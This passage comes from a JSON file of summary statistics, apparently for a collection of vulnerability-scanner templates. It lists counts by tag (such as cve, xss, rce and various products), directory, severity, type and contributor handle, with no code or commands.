@am0nt31r0","count":1},{"name":"0h1in9e","count":1},{"name":"ooooooo_q","count":1},{"name":"ldionmarcil","count":1},{"name":"becivells","count":1},{"name":"sec_hawk","count":1},{"name":"iampritam","count":1},{"name":"apt-mirror","count":1},{"name":"alex","count":1},{"name":"soyelmago","count":1},{"name":"fmunozs","count":1},{"name":"adrianmf","count":1},{"name":"mah3sec_","count":1},{"name":"juicypotato1","count":1},{"name":"undefl0w","count":1},{"name":"ajaysenr","count":1},{"name":"willd96","count":1},{"name":"qlkwej","count":1},{"name":"daviey","count":1},{"name":"0xrod","count":1},{"name":"omarkurt","count":1},{"name":"pdp","count":1},{"name":"evolutionsec","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"zhenwarx","count":1},{"name":"philippdelteil","count":1},{"name":"regala_","count":1},{"name":"0xteles","count":1},{"name":"bjhulst","count":1},{"name":"wabafet","count":1},{"name":"b0yd","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"affix","count":1},{"name":"schniggie","count":1},{"name":"intx0x80","count":1},{"name":"naglinagli","count":1},{"name":"sickwell","count":1},{"name":"bernardofsr","count":1},{"name":"knassar702","count":1},{"name":"kareemse1im","count":1},{"name":"streetofhackerr007 (rohit 
soni)","count":1},{"name":"kabirsuda","count":1},{"name":"shelld3v","count":1},{"name":"divya_mudgal","count":1},{"name":"geraldino2","count":1},{"name":"gboddin","count":1},{"name":"petruknisme","count":1},{"name":"aresx","count":1},{"name":"deena","count":1},{"name":"akshansh","count":1},{"name":"retr0","count":1},{"name":"b4uh0lz","count":1},{"name":"tim_koopmans","count":1},{"name":"luskabol","count":1},{"name":"0ut0fb4nd","count":1},{"name":"@dwisiswant0","count":1},{"name":"rojanrijal","count":1},{"name":"exploitation","count":1},{"name":"blckraven","count":1},{"name":"_c0wb0y_","count":1},{"name":"berkdusunur","count":1},{"name":"andirrahmani1","count":1},{"name":"thevillagehacker","count":1},{"name":"jteles","count":1},{"name":"taielab","count":1},{"name":"ohlinge","count":1},{"name":"sicksec","count":1},{"name":"mass0ma","count":1},{"name":"pudsec","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"yashgoti","count":1},{"name":"b0rn2r00t","count":1},{"name":"streetofhackerr007","count":1},{"name":"mubassirpatel","count":1},{"name":"absshax","count":1},{"name":"bad5ect0r","count":1},{"name":"its0x08","count":1},{"name":"whynotke","count":1},{"name":"noamrathaus","count":1},{"name":"th3.d1p4k","count":1},{"name":"chron0x","count":1},{"name":"ipanda","count":1},{"name":"_harleo","count":1},{"name":"ahmed sherif","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"kre80r","count":1},{"name":"udyz","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"infosecsanyam","count":1},{"name":"alph4byt3","count":1},{"name":"sullo","count":1},{"name":"x6263","count":1},{"name":"andysvints","count":1},{"name":"remonsec","count":1},{"name":"co0nan","count":1},{"name":"manuelbua","count":1},{"name":"toufik 
airane","count":1},{"name":"defr0ggy","count":1},{"name":"mesaglio","count":1},{"name":"d0rkerdevil","count":1},{"name":"furkansenan","count":1},{"name":"ringo","count":1},{"name":"idealphase","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sshell","count":1},{"name":"fopina","count":1},{"name":"tirtha_mandal","count":1},{"name":"akash.c","count":1},{"name":"kurohost","count":1},{"name":"smaranchand","count":1},{"name":"thezakman","count":1},{"name":"notsoevilweasel","count":1},{"name":"luci","count":1},{"name":"jeya seelan","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"raesene","count":1},{"name":"me9187","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"alperenkesk","count":1},{"name":"micha3lb3n","count":1},{"name":"bolli95","count":1},{"name":"shifacyclewla","count":1},{"name":"ilovebinbash","count":1}],"directory":[{"name":"cves","count":674},{"name":"vulnerabilities","count":284},{"name":"exposed-panels","count":235},{"name":"exposures","count":186},{"name":"technologies","count":170},{"name":"misconfiguration","count":129},{"name":"takeovers","count":71},{"name":"default-logins","count":54},{"name":"file","count":46},{"name":"workflows","count":35},{"name":"network","count":30},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"fuzzing","count":9},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":615},{"name":"high","count":535},{"name":"medium","count":413},{"name":"critical","count":236},{"name":"low","count":161}],"types":[{"name":"http","count":1859},{"name":"file","count":46},{"name":"network","count":39},{"name":"dns","count":11}]} 
+{"tags":[{"name":"cve","count":690},{"name":"lfi","count":250},{"name":"panel","count":248},{"name":"xss","count":227},{"name":"exposure","count":226},{"name":"wordpress","count":207},{"name":"rce","count":195},{"name":"tech","count":169},{"name":"cve2020","count":160},{"name":"wp-plugin","count":140},{"name":"cve2021","count":115},{"name":"cve2019","count":93},{"name":"config","count":93},{"name":"cve2018","count":82},{"name":"joomla","count":74},{"name":"apache","count":68},{"name":"takeover","count":66},{"name":"token","count":65},{"name":"cve2010","count":64},{"name":"default-login","count":63},{"name":"iot","count":62},{"name":"oob","count":51},{"name":"cve2017","count":49},{"name":"file","count":46},{"name":"unauth","count":45},{"name":"network","count":41},{"name":"sqli","count":38},{"name":"","count":36},{"name":"oracle","count":36},{"name":"ssrf","count":35},{"name":"cve2016","count":32},{"name":"logs","count":30},{"name":"redirect","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":25},{"name":"misc","count":23},{"name":"cve2015","count":21},{"name":"disclosure","count":21},{"name":"generic","count":20},{"name":"auth-bypass","count":20},{"name":"cisco","count":19},{"name":"aem","count":19},{"name":"router","count":19},{"name":"sap","count":18},{"name":"springboot","count":17},{"name":"debug","count":16},{"name":"cve2014","count":15},{"name":"misconfig","count":15},{"name":"cve2012","count":14},{"name":"cve2011","count":14},{"name":"weblogic","count":14},{"name":"login","count":14},{"name":"android","count":13},{"name":"adobe","count":13},{"name":"struts","count":13},{"name":"fuzz","count":13},{"name":"devops","count":13},{"name":"php","count":13},{"name":"dlink","count":12},{"name":"dns","count":12},{"name":"jenkins","count":12},{"name":"cve2013","count":11},{"name":"zoho","count":11},{"name":"dell","count":10},{"name":"aws","count":10},{"name":"xxe","count":9},{"name":"ftp","count":9},{"name":"magento","count
":9},{"name":"airflow","count":8},{"name":"intrusive","count":8},{"name":"rails","count":8},{"name":"scada","count":8},{"name":"gitlab","count":8},{"name":"nginx","count":8},{"name":"cnvd","count":8},{"name":"ruijie","count":8},{"name":"backup","count":7},{"name":"netgear","count":7},{"name":"coldfusion","count":7},{"name":"files","count":7},{"name":"kubernetes","count":7},{"name":"cve2009","count":7},{"name":"cms","count":7},{"name":"google","count":7},{"name":"confluence","count":7},{"name":"vmware","count":7},{"name":"ibm","count":7},{"name":"laravel","count":6},{"name":"cve2008","count":6},{"name":"docker","count":6},{"name":"api","count":6},{"name":"django","count":6},{"name":"solr","count":6},{"name":"citrix","count":6},{"name":"rconfig","count":6},{"name":"jetty","count":6},{"name":"circarlife","count":5},{"name":"jolokia","count":5},{"name":"wp-theme","count":5},{"name":"headless","count":5},{"name":"windows","count":5},{"name":"microsoft","count":5},{"name":"dedecms","count":5},{"name":"ssti","count":5},{"name":"phpmyadmin","count":5},{"name":"tomcat","count":5},{"name":"deserialization","count":5},{"name":"iis","count":5},{"name":"fileupload","count":5},{"name":"drupal","count":5},{"name":"nodejs","count":5},{"name":"lucee","count":5},{"name":"printer","count":5},{"name":"java","count":5},{"name":"wso2","count":4},{"name":"webserver","count":4},{"name":"thinkcmf","count":4},{"name":"traversal","count":4},{"name":"exchange","count":4},{"name":"grafana","count":4},{"name":"samsung","count":4},{"name":"hongdian","count":4},{"name":"resin","count":4},{"name":"crlf","count":4},{"name":"thinkphp","count":4},{"name":"strapi","count":4},{"name":"magmi","count":4},{"name":"proxy","count":4},{"name":"vpn","count":4},{"name":"firmware","count":4},{"name":"artifactory","count":4},{"name":"symantec","count":4},{"name":"glpi","count":4},{"name":"solarwinds","count":4},{"name":"zimbra","count":4},{"name":"buffalo","count":4},{"name":"elastic","count":4},{"name":"symfony"
,"count":4},{"name":"asp","count":4},{"name":"hp","count":4},{"name":"moodle","count":4},{"name":"openssh","count":3},{"name":"fanruan","count":3},{"name":"httpd","count":3},{"name":"tikiwiki","count":3},{"name":"bypass","count":3},{"name":"springcloud","count":3},{"name":"nacos","count":3},{"name":"prometheus","count":3},{"name":"bigip","count":3},{"name":"ebs","count":3},{"name":"ssh","count":3},{"name":"backups","count":3},{"name":"firebase","count":3},{"name":"fpd","count":3},{"name":"cacti","count":3},{"name":"nosqli","count":3},{"name":"terramaster","count":3},{"name":"caucho","count":3},{"name":"ofbiz","count":3},{"name":"slack","count":3},{"name":"oa","count":3},{"name":"nexus","count":3},{"name":"kafka","count":3},{"name":"amazon","count":3},{"name":"log","count":3},{"name":"mail","count":3},{"name":"openam","count":3},{"name":"zabbix","count":3},{"name":"camera","count":3},{"name":"vbulletin","count":3},{"name":"jellyfin","count":3},{"name":"r-seenet","count":3},{"name":"kibana","count":3},{"name":"git","count":3},{"name":"npm","count":3},{"name":"kevinlab","count":3},{"name":"microstrategy","count":3},{"name":"druid","count":3},{"name":"bitrix","count":3},{"name":"injection","count":3},{"name":"targa","count":3},{"name":"lfr","count":3},{"name":"telerik","count":3},{"name":"itop","count":3},{"name":"linkerd","count":3},{"name":"mongodb","count":3},{"name":"zhiyuan","count":3},{"name":"smtp","count":3},{"name":"opensis","count":3},{"name":"openfire","count":2},{"name":"cache","count":2},{"name":"axis","count":2},{"name":"oauth","count":2},{"name":"shellshock","count":2},{"name":"mcafee","count":2},{"name":"mida","count":2},{"name":"maian","count":2},{"name":"emerge","count":2},{"name":"prestashop","count":2},{"name":"ucmdb","count":2},{"name":"nextjs","count":2},{"name":"cve2005","count":2},{"name":"splunk","count":2},{"name":"ec2","count":2},{"name":"activemq","count":2},{"name":"db","count":2},{"name":"hoteldruid","count":2},{"name":"jsf","count":2},{"na
me":"xxljob","count":2},{"name":"seeyon","count":2},{"name":"frp","count":2},{"name":"showdoc","count":2},{"name":"hostheader-injection","count":2},{"name":"dolibarr","count":2},{"name":"glassfish","count":2},{"name":"hasura","count":2},{"name":"horde","count":2},{"name":"bucket","count":2},{"name":"icewarp","count":2},{"name":"ecology","count":2},{"name":"wordfence","count":2},{"name":"storage","count":2},{"name":"status","count":2},{"name":"akkadian","count":2},{"name":"netis","count":2},{"name":"backdoor","count":2},{"name":"kentico","count":2},{"name":"yii","count":2},{"name":"webcam","count":2},{"name":"voipmonitor","count":2},{"name":"geowebserver","count":2},{"name":"idrac","count":2},{"name":"keycloak","count":2},{"name":"natshell","count":2},{"name":"pega","count":2},{"name":"sharepoint","count":2},{"name":"spark","count":2},{"name":"harbor","count":2},{"name":"totemomail","count":2},{"name":"phpcollab","count":2},{"name":"sonicwall","count":2},{"name":"avantfax","count":2},{"name":"netsweeper","count":2},{"name":"fortios","count":2},{"name":"service","count":2},{"name":"odoo","count":2},{"name":"rockethchat","count":2},{"name":"favicon","count":2},{"name":"igs","count":2},{"name":"leak","count":2},{"name":"jeedom","count":2},{"name":"nagios","count":2},{"name":"ilo","count":2},{"name":"adminer","count":2},{"name":"prtg","count":2},{"name":"dos","count":2},{"name":"saltstack","count":2},{"name":"rockmongo","count":2},{"name":"middleware","count":2},{"name":"rstudio","count":2},{"name":"yapi","count":2},{"name":"akamai","count":2},{"name":"axis2","count":2},{"name":"bruteforce","count":2},{"name":"sonarqube","count":2},{"name":"hpe","count":2},{"name":"hashicorp","count":2},{"name":"chamilo","count":2},{"name":"guacamole","count":2},{"name":"smb","count":2},{"name":"plesk","count":2},{"name":"waf","count":2},{"name":"jboss","count":2},{"name":"huawei","count":2},{"name":"hjtcloud","count":2},{"name":"github","count":2},{"name":"node","count":2},{"name":"palo
alto","count":2},{"name":"azure","count":2},{"name":"kong","count":2},{"name":"liferay","count":2},{"name":"grav","count":2},{"name":"chiyu","count":2},{"name":"couchdb","count":2},{"name":"vrealize","count":2},{"name":"flir","count":2},{"name":"cve2007","count":2},{"name":"globalprotect","count":2},{"name":"trixbox","count":2},{"name":"nextcloud","count":2},{"name":"beanshell","count":1},{"name":"wondercms","count":1},{"name":"tor","count":1},{"name":"sar2html","count":1},{"name":"erp-nc","count":1},{"name":"uwsgi","count":1},{"name":"swagger","count":1},{"name":"wmt","count":1},{"name":"yealink","count":1},{"name":"plastic","count":1},{"name":"announcekit","count":1},{"name":"gsoap","count":1},{"name":"hiboss","count":1},{"name":"jfrog","count":1},{"name":"phpwiki","count":1},{"name":"aura","count":1},{"name":"openrestry","count":1},{"name":"gstorage","count":1},{"name":"mailchimp","count":1},{"name":"h3c-imc","count":1},{"name":"visualtools","count":1},{"name":"realteo","count":1},{"name":"solman","count":1},{"name":"vsftpd","count":1},{"name":"api-manager","count":1},{"name":"pacsone","count":1},{"name":"razor","count":1},{"name":"opencast","count":1},{"name":"landrayoa","count":1},{"name":"cve2006","count":1},{"name":"traefik","count":1},{"name":"graphql","count":1},{"name":"maccmsv10","count":1},{"name":"upload","count":1},{"name":"clink-office","count":1},{"name":"owa","count":1},{"name":"bolt","count":1},{"name":"sureline","count":1},{"name":"checkpoint","count":1},{"name":"dotnet","count":1},{"name":"bedita","count":1},{"name":"fortigate","count":1},{"name":"eyou","count":1},{"name":"mysql","count":1},{"name":"frontpage","count":1},{"name":"varnish","count":1},{"name":"sitecore","count":1},{"name":"auth","count":1},{"name":"gogs","count":1},{"name":"hiawatha","count":1},{"name":"mpsec","count":1},{"name":"bash","count":1},{"name":"actuator","count":1},{"name":"resourcespace","count":1},{"name":"visionhub","count":1},{"name":"pgadmin","count":1},{"name":"wif
isky","count":1},{"name":"exposures","count":1},{"name":"ambari","count":1},{"name":"keenetic","count":1},{"name":"logontracer","count":1},{"name":"xml","count":1},{"name":"avalanche","count":1},{"name":"sceditor","count":1},{"name":"starttls","count":1},{"name":"terraform","count":1},{"name":"nuxeo","count":1},{"name":"lansweeper","count":1},{"name":"spf","count":1},{"name":"episerver","count":1},{"name":"adb","count":1},{"name":"jquery","count":1},{"name":"bazarr","count":1},{"name":"scimono","count":1},{"name":"cves2016","count":1},{"name":"twitter-server","count":1},{"name":"esmtp","count":1},{"name":"bitly","count":1},{"name":"zookeeper","count":1},{"name":"zeroshell","count":1},{"name":"ems","count":1},{"name":"timeclock","count":1},{"name":"spip","count":1},{"name":"moin","count":1},{"name":"codeigniter","count":1},{"name":"doh","count":1},{"name":"wazuh","count":1},{"name":"alerta","count":1},{"name":"simplecrm","count":1},{"name":"karel","count":1},{"name":"synnefo","count":1},{"name":"couchbase","count":1},{"name":"socomec","count":1},{"name":"sco","count":1},{"name":"stem","count":1},{"name":"mdb","count":1},{"name":"livezilla","count":1},{"name":"micrsoft","count":1},{"name":"chyrp","count":1},{"name":"zm","count":1},{"name":"pmb","count":1},{"name":"74cms","count":1},{"name":"accela","count":1},{"name":"b2evolution","count":1},{"name":"ioncube","count":1},{"name":"lotus","count":1},{"name":"postmessage","count":1},{"name":"acexy","count":1},{"name":"phpfusion","count":1},{"name":"cgi","count":1},{"name":"feifeicms","count":1},{"name":"rmi","count":1},{"name":"javafaces","count":1},{"name":"metabase","count":1},{"name":"xunchi","count":1},{"name":"htmli","count":1},{"name":"vscode","count":1},{"name":"openerp","count":1},{"name":"openx","count":1},{"name":"mantisbt","count":1},{"name":"zenario","count":1},{"name":"clave","count":1},{"name":" 
default-login","count":1},{"name":"ssltls","count":1},{"name":"opentsdb","count":1},{"name":"sophos","count":1},{"name":"zarafa","count":1},{"name":"ntopng","count":1},{"name":"sidekiq","count":1},{"name":"elascticsearch","count":1},{"name":"mirai","count":1},{"name":"2014","count":1},{"name":"redis","count":1},{"name":"pippoint","count":1},{"name":"pagespeed","count":1},{"name":"lutron","count":1},{"name":"nette","count":1},{"name":"glances","count":1},{"name":"expose","count":1},{"name":"ewebs","count":1},{"name":"flash","count":1},{"name":"meraki","count":1},{"name":"k8s","count":1},{"name":"redwood","count":1},{"name":"asus","count":1},{"name":"csod","count":1},{"name":"viewpoint","count":1},{"name":"shopware","count":1},{"name":"tapestry","count":1},{"name":"avtech","count":1},{"name":"opensns","count":1},{"name":"appweb","count":1},{"name":"camunda","count":1},{"name":"enum","count":1},{"name":"nc2","count":1},{"name":"qsan","count":1},{"name":"sprintful","count":1},{"name":"upnp","count":1},{"name":"s3","count":1},{"name":"oneblog","count":1},{"name":"graphite","count":1},{"name":"kyan","count":1},{"name":"javascript","count":1},{"name":"ssl","count":1},{"name":"nomad","count":1},{"name":"vsphere","count":1},{"name":"bullwark","count":1},{"name":"dvr","count":1},{"name":"dotnetnuke","count":1},{"name":"huijietong","count":1},{"name":"blind","count":1},{"name":"nexusdb","count":1},{"name":"shoppable","count":1},{"name":"netdata","count":1},{"name":"wiki","count":1},{"name":"webmin","count":1},{"name":"embedthis","count":1},{"name":"addpac","count":1},{"name":"javamelody","count":1},{"name":"perl","count":1},{"name":"selea","count":1},{"name":"node-red-dashboard","count":1},{"name":"nedi","count":1},{"name":"yachtcontrol","count":1},{"name":"memcached","count":1},{"name":"centreon","count":1},{"name":"fastcgi","count":1},{"name":"cofax","count":1},{"name":"circontrol","count":1},{"name":"spectracom","count":1},{"name":"faraday","count":1},{"name":"dnssec","coun
t":1},{"name":"acme","count":1},{"name":"blackboard","count":1},{"name":"minio","count":1},{"name":"froxlor","count":1},{"name":"ghost","count":1},{"name":"darkstat","count":1},{"name":"jmx","count":1},{"name":"turbocrm","count":1},{"name":"xmlchart","count":1},{"name":"geutebruck","count":1},{"name":"eprints","count":1},{"name":"comodo","count":1},{"name":"zzzcms","count":1},{"name":"rsyncd","count":1},{"name":"servicedesk","count":1},{"name":"basic-auth","count":1},{"name":"kafdrop","count":1},{"name":"qcubed","count":1},{"name":"mara","count":1},{"name":"kubeflow","count":1},{"name":"monitorix","count":1},{"name":"jaspersoft","count":1},{"name":"jenzabar","count":1},{"name":"tjws","count":1},{"name":"openemr","count":1},{"name":"zyxel","count":1},{"name":"minimouse","count":1},{"name":"goahead","count":1},{"name":"tensorboard","count":1},{"name":"phpfastcache","count":1},{"name":"clusterengine","count":1},{"name":"qdpm","count":1},{"name":"dompdf","count":1},{"name":"influxdb","count":1},{"name":"skywalking","count":1},{"name":"office365","count":1},{"name":"linkedin","count":1},{"name":"alibaba","count":1},{"name":"klog","count":1},{"name":"jnoj","count":1},{"name":"proftpd","count":1},{"name":"aspnuke","count":1},{"name":"springframework","count":1},{"name":"smartblog","count":1},{"name":"nuuo","count":1},{"name":"jenkin","count":1},{"name":"discord","count":1},{"name":"iceflow","count":1},{"name":"gateone","count":1},{"name":"webadmin","count":1},{"name":"biometrics","count":1},{"name":"duomicms","count":1},{"name":"kerbynet","count":1},{"name":"rdp","count":1},{"name":"setup","count":1},{"name":"xvr","count":1},{"name":"nordex","count":1},{"name":"lighttpd","count":1},{"name":"scs","count":1},{"name":"openvpn","count":1},{"name":"listserv","count":1},{"name":"rfi","count":1},{"name":"labtech","count":1},{"name":"crm","count":1},{"name":"iptime","count":1},{"name":"svnserve","count":1},{"name":"mongo","count":1},{"name":"csrf","count":1},{"name":"ulterius","co
unt":1},{"name":"salesforce","count":1},{"name":"netgenie","count":1},{"name":"cocoon","count":1},{"name":"sarg","count":1},{"name":"interlib","count":1},{"name":"magicflow","count":1},{"name":"sqlite","count":1},{"name":"netrc","count":1},{"name":"plone","count":1},{"name":"zmanda","count":1},{"name":"oscommerce","count":1},{"name":"chevereto","count":1},{"name":"oidc","count":1},{"name":"gespage","count":1},{"name":"wing-ftp","count":1},{"name":"fiori","count":1},{"name":"calendarix","count":1},{"name":"pihole","count":1},{"name":"tika","count":1},{"name":"getsimple","count":1},{"name":"etouch","count":1},{"name":"clockwatch","count":1},{"name":"haproxy","count":1},{"name":"qvisdvr","count":1},{"name":"totaljs","count":1},{"name":"domxss","count":1},{"name":"nps","count":1},{"name":"payara","count":1},{"name":"cloudinary","count":1},{"name":"vnc","count":1},{"name":"gitlist","count":1},{"name":"panabit","count":1},{"name":"rhymix","count":1},{"name":"diris","count":1},{"name":"majordomo2","count":1},{"name":"anchorcms","count":1},{"name":"processmaker","count":1},{"name":"nimble","count":1},{"name":"whm","count":1},{"name":"szhe","count":1},{"name":"blue-ocean","count":1},{"name":"tongda","count":1},{"name":"lancom","count":1},{"name":"fortiweb","count":1},{"name":"sangfor","count":1},{"name":"trane","count":1},{"name":"dbeaver","count":1},{"name":"opm","count":1},{"name":"robomongo","count":1},{"name":"phalcon","count":1},{"name":"werkzeug","count":1},{"name":"octoprint","count":1},{"name":"plugin","count":1},{"name":"artica","count":1},{"name":"wooyun","count":1},{"name":"geddy","count":1},{"name":"krweb","count":1},{"name":"email","count":1},{"name":"tpshop","count":1},{"name":"trilithic","count":1},{"name":"tectuus","count":1},{"name":"vidyo","count":1},{"name":"clockwork","count":1},{"name":"octobercms","count":1},{"name":"burp","count":1},{"name":"alertmanager","count":1},{"name":"cse","count":1},{"name":"nsasg","count":1},{"name":"pyramid","count":1},{"name
":"bigbluebutton","count":1},{"name":"webftp","count":1},{"name":"drone","count":1},{"name":"rujjie","count":1},{"name":"idemia","count":1},{"name":"wavlink","count":1},{"name":"circontrorl","count":1},{"name":"gotmls","count":1},{"name":"nweb2fax","count":1},{"name":"enumeration","count":1},{"name":"soar","count":1},{"name":"parentlink","count":1},{"name":"grails","count":1},{"name":"default","count":1},{"name":"monitorr","count":1},{"name":"mongoshake","count":1},{"name":"sourcebans","count":1},{"name":"expn","count":1},{"name":"postgres","count":1},{"name":"argussurveillance","count":1},{"name":"owasp","count":1},{"name":"manageengine","count":1},{"name":"flink","count":1},{"name":"commax","count":1},{"name":"lotuscms","count":1},{"name":"seacms","count":1},{"name":"netmask","count":1},{"name":"tileserver","count":1},{"name":"spidercontrol","count":1},{"name":"apos","count":1},{"name":"tieline","count":1},{"name":"eyelock","count":1},{"name":"ganglia","count":1},{"name":"tracer","count":1},{"name":"panos","count":1},{"name":"ruby","count":1},{"name":"wuzhicms","count":1},{"name":"gloo","count":1},{"name":"zend","count":1},{"name":"rmc","count":1},{"name":"st","count":1},{"name":"chinaunicom","count":1},{"name":"daybyday","count":1},{"name":"cyberoam","count":1},{"name":"fortinet","count":1},{"name":"phpunit","count":1},{"name":"smi","count":1},{"name":"mediumish","count":1},{"name":"shopxo","count":1},{"name":"pcoip","count":1},{"name":"primetek","count":1},{"name":"bookstack","count":1},{"name":"tenda","count":1},{"name":"acontent","count":1},{"name":"metinfo","count":1},{"name":"tensorflow","count":1},{"name":"emc","count":1},{"name":"ecom","count":1},{"name":"heroku","count":1},{"name":"discourse","count":1},{"name":"empirecms","count":1},{"name":"hadoop","count":1},{"name":"dotclear","count":1},{"name":"jitsi","count":1},{"name":"ilo4","count":1},{"name":"eg","count":1},{"name":"redhat","count":1},{"name":"redmine","count":1},{"name":"ruckus","count":1},{"nam
e":"woocomernce","count":1},{"name":"ognl","count":1},{"name":"jeewms","count":1},{"name":"moinmoin","count":1},{"name":"xff","count":1},{"name":"fortigates","count":1},{"name":"tcexam","count":1},{"name":"clickhouse","count":1},{"name":"fastapi","count":1},{"name":"extractor","count":1},{"name":"nifi","count":1},{"name":"wavemaker","count":1},{"name":"weiphp","count":1},{"name":"gridx","count":1},{"name":"fedora","count":1},{"name":"zcms","count":1},{"name":"sentry","count":1},{"name":"codemeter","count":1},{"name":"aruba","count":1},{"name":"smartsense","count":1},{"name":"achecker","count":1},{"name":"sage","count":1},{"name":"spring","count":1},{"name":"plc","count":1},{"name":"saltapi","count":1},{"name":"lg-nas","count":1},{"name":"fuelcms","count":1},{"name":"shiro","count":1},{"name":"websphere","count":1},{"name":"wamp","count":1},{"name":"dom","count":1},{"name":"cloudflare","count":1},{"name":"wildfly","count":1},{"name":"arl","count":1},{"name":"phpinfo","count":1},{"name":"floc","count":1},{"name":"solarlog","count":1},{"name":"tidb","count":1},{"name":"mobileiron","count":1},{"name":"cobub","count":1},{"name":"concrete","count":1},{"name":"pulsesecure","count":1},{"name":"dvwa","count":1},{"name":"optiLink","count":1},{"name":"apiman","count":1},{"name":"finereport","count":1},{"name":"portainer","count":1},{"name":"viewlinc","count":1},{"name":"thinkadmin","count":1},{"name":"cors","count":1},{"name":"redcap","count":1},{"name":"graylog","count":1},{"name":"powercreator","count":1},{"name":"zms","count":1},{"name":"jsp","count":1},{"name":"sgp","count":1},{"name":"gunicorn","count":1},{"name":"linux","count":1},{"name":"miscrsoft","count":1},{"name":"centos","count":1},{"name":"craftcms","count":1},{"name":"mariadb","count":1},{"name":"emby","count":1},{"name":"ricoh","count":1},{"name":"cockpit","count":1},{"name":"cherokee","count":1},{"name":"triconsole","count":1},{"name":"fortilogger","count":1},{"name":"mautic","count":1},{"name":"ueditor","coun
t":1},{"name":"mrtg","count":1},{"name":"openstack","count":1},{"name":"xdcms","count":1},{"name":"expressjs","count":1},{"name":"hortonworks","count":1},{"name":"azkaban","count":1},{"name":"mantis","count":1},{"name":"myvuehelp","count":1},{"name":"lanproxy","count":1},{"name":"opensmtpd","count":1},{"name":"webui","count":1},{"name":"linksys","count":1},{"name":"myucms","count":1},{"name":"xiuno","count":1},{"name":"zte","count":1},{"name":"rabbitmq","count":1},{"name":"k8","count":1},{"name":"servicenow","count":1},{"name":"rubedo","count":1},{"name":"svn","count":1},{"name":"tamronos","count":1},{"name":"landray","count":1},{"name":"subrion","count":1},{"name":"cerebro","count":1},{"name":"exacqvision","count":1},{"name":"exponentcms","count":1},{"name":"websvn","count":1},{"name":"webmodule-ee","count":1},{"name":"ns","count":1},{"name":"timesheet","count":1},{"name":"commscope","count":1}],"authors":[{"name":"dhiyaneshdk","count":252},{"name":"pikpikcu","count":250},{"name":"daffainfo","count":199},{"name":"pdteam","count":195},{"name":"geeknik","count":151},{"name":"dwisiswant0","count":132},{"name":"gy741","count":72},{"name":"madrobot","count":62},{"name":"princechaddha","count":60},{"name":"pussycat0x","count":58},{"name":"gaurang","count":42},{"name":"0x_akoko","count":33},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"philippedelteil","count":23},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"hackergautam","count":9},{"name":"nadino","count":9},{"name":"melbadry9","count":9},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"oppsec","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothr
a_","count":7},{"name":"emadshanab","count":7},{"name":"dr_set","count":7},{"name":"kophjager007","count":7},{"name":"dogasantos","count":7},{"name":"techryptic (@tech)","count":7},{"name":"0x240x23elu","count":7},{"name":"logicalhunter","count":6},{"name":"puzzlepeaches","count":6},{"name":"meme-lord","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"joanbono","count":5},{"name":"panch0r3d","count":5},{"name":"pentest_swissky","count":5},{"name":"ganofins","count":5},{"name":"elsfa7110","count":5},{"name":"iamnoooob","count":5},{"name":"yanyun","count":5},{"name":"rootxharsh","count":5},{"name":"xelkomy","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"lu4nx","count":4},{"name":"github.com/its0x08","count":4},{"name":"yash anand @yashanand155","count":3},{"name":"0w4ys","count":3},{"name":"incogbyte","count":3},{"name":"_generic_human_","count":3},{"name":"z3bd","count":3},{"name":"skeltavik","count":3},{"name":"vsh00t","count":3},{"name":"f1tz","count":3},{"name":"mavericknerd","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"shifacyclewala","count":3},{"name":"johnk3r","count":3},{"name":"idealphase","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dudez","count":3},{"name":"fyoorer","count":3},{"name":"impramodsargar","count":3},{"name":"tess","count":3},{"name":"jarijaas","count":3},{"name":"shine","count":3},{"name":"foulenzer","count":2},{"name":"zomsop82","count":2},{"name":"dheerajmadhukar","count":2},{"name":"udit_thakkur","count":2},{"name":"g4l1t0","count":2},{"name":"parth","count":2},{"name":"joeldeleep","count":2},{"name":"davidmckennirey","count":2},{"name":"gevakun","count":2},{"name":"0xelkomy","count":2},{"name":"ree4pwn","count":2},{"name":"0xsapra","count":2},{"name":"cocxanh","count":2},{"name":"whoever","count":2},{"name":"huowuzhao","count":2},{"name":"lotusdll","count":2},{"name":"pxmme1337","count":2},{"name":"gal 
nagli","count":2},{"name":"alifathi-h1","count":2},{"name":"swissky","count":2},{"name":"johnjhacking","count":2},{"name":"r3naissance","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"afaq","count":2},{"name":"fabaff","count":2},{"name":"moritz 